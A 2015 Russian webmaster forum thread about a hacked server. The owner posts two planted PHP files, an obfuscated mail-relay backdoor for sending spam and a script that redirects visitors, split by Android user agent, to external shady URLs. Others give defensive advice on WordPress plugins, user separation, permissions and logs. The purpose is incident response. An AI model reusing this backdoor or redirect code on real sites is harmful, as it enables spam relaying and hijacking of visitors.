Master-X
Форум | Новости | Статьи
Главная » Форум » Программинг, Скрипты, Софт, Сервисы » 
Тема: Ломанули сервак! Скрипты: Tuberotator, Smart CJ, WP, Crystal
цитата
10/01/15 в 17:33
 CrazyMen
Обнаружи у себя повсеместно созданный файл wfg.php с таким содержимым:

<?php $HmqenXtApUBX = stripslashes($_POST['OejVxex']); $SFQsFl = stripslashes($_POST['GQrR']); $oabczZQYGw = stripslashes($_POST['bupthoehyRL']);  $rato = mail(stripslashes($HmqenXtApUBX), stripslashes($SFQsFl), stripslashes($oabczZQYGw)); if($rato){echo 'dOuAfkhHe';} else {echo 'MdxXEYvzD : '.$XJaIKNNKlBfm;} ?>

Проверьте у себя наличие на всякий пожарный.
цитата
10/01/15 в 17:57
 Evial
я бы присмотрелся к WP и его плагинам icon_sad.gif
цитата
10/01/15 в 18:17
 CrazyMen
Даже пока что не знаю на что думать...
цитата
10/01/15 в 18:59
 Дартаньян
CrazyMen: стукни мне в скайп помогу. А так могли через что угодно но в этом списке скорее CJ.
цитата
11/01/15 в 23:42
 karbonv
"Tuberotator, Smart CJ, WP, Crystal"

Ппц бро! Совет тебе хороший дам - раздели все скрипты по юзерам, так хоть знать будешь где тебя ебанули icon_surprised.gif
цитата
12/01/15 в 00:14
 nrianx
WP нуленый плагин с шелом какой нить, было уже такое
цитата
12/01/15 в 21:33
 CrazyMen
Да че то недоглядел за этим обычно каждый домен отдельный юзер, а тут.. facepalm.gif Скорее всего Wp конечно, только утсановили уже спамить блять начинают, поэтому его и не люблю.. Чем популярнее скрипт тем больше дыр icon_surprised.gif
цитата
12/01/15 в 22:23
 Дартаньян
CrazyMen: вернее не в нем а в темах и плагинах, про спам отруби комменты и все ок.
цитата
13/01/15 в 09:35
 Cosinus
советую зарегистриться на ifube и узнавать о появлении всяких левых файлов сразу. сервис пока еще бесплатный.
цитата
13/01/15 в 11:26
 Дартаньян
Cosinus: была такаяже мысля.
цитата
13/01/15 в 18:18
 karbonv
CrazyMen писал:
только утсановили уже спамить блять начинают

Тыц
но как они к сисечным сайтам относятся я хз trollface.png
цитата
13/01/15 в 19:46
 CrazyMen
Кароче вычистили червак от нечисти. Удалил WP. И сегодня опять всякая хуйня, но уже только на том домене где стоит tuberotator и crustal. Картина возможно сужается...
цитата
13/01/15 в 19:56
 CrazyMen
Только там где стоит тубротатор захуячили разноименный php с таким вот содержимым:
<?php

$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$android_urls = array (
         'http://com-ap8.net/zoota.php?a=314759&c=wl_con&s=12AND',
         'http://com-152.net/bfqa.php?a=314759&c=wl_con&s=12AND',
         'http://com-uh4.net/rbhnc.php?a=314759&c=wl_con&s=12AND',
);
$not_android_urls = array (
         'http://com-ap8.net/addd.php?a=314759&c=wl_con&s=12YP',
         'http://com-152.net/uzder.php?a=314759&c=wl_con&s=12YP',
         'http://com-uh4.net/uls.php?a=314759&c=wl_con&s=12YP',
);
$n = mt_rand(0,count($not_android_urls)-1);
$rand_url=$not_android_urls[$n];

if ( $android  == true)
{
$n = mt_rand(0,count($android_urls)-1);
$rand_url=$android_urls[$n];
}
?>
<meta http-equiv="refresh" content="2; url=<?php echo $rand_url;?> ">
цитата
13/01/15 в 20:46
 karbonv
CrazyMen писал:
Картина возможно сужается...


может дело не в скриптах вовсе? то что код нахуячили это одно, он любой может быть

Смотри сам сервер, чмод, доступы... логи читай в конце концов
цитата
13/01/15 в 20:50
 nrianx
Тебе теперь проверяй все файлы, потому что если владелиц папки где вп стоял и везде владельцем был то мод везде залезть.
цитата
13/01/15 в 23:18
 CrazyMen
Ебошат через апач... icon_twisted.gif icon_cry.gif smail43.gif
цитата
13/01/15 в 23:55
 Дартаньян
CrazyMen: апач?
цитата
14/01/15 в 00:13
 karbonv
Если хост тот что в подписи там сипанелька по идее стоит, давно ее не юзал правда, но по памяти там иерархия хранения скриптов и назначение им юзеров - полный пиздец (может что и изменилось за последнее время я хз), если у тебя было все в одном котле 100 % у тебя уже заражено все скрипты, и то чтоты удалишь файл или один из скриптов полностью до жопы и апач не причем!
цитата
14/01/15 в 02:02
 Дартаньян
как я и ранее говорил пиши мне глянем что за пиздец у тебя.


Эта страница в полной версии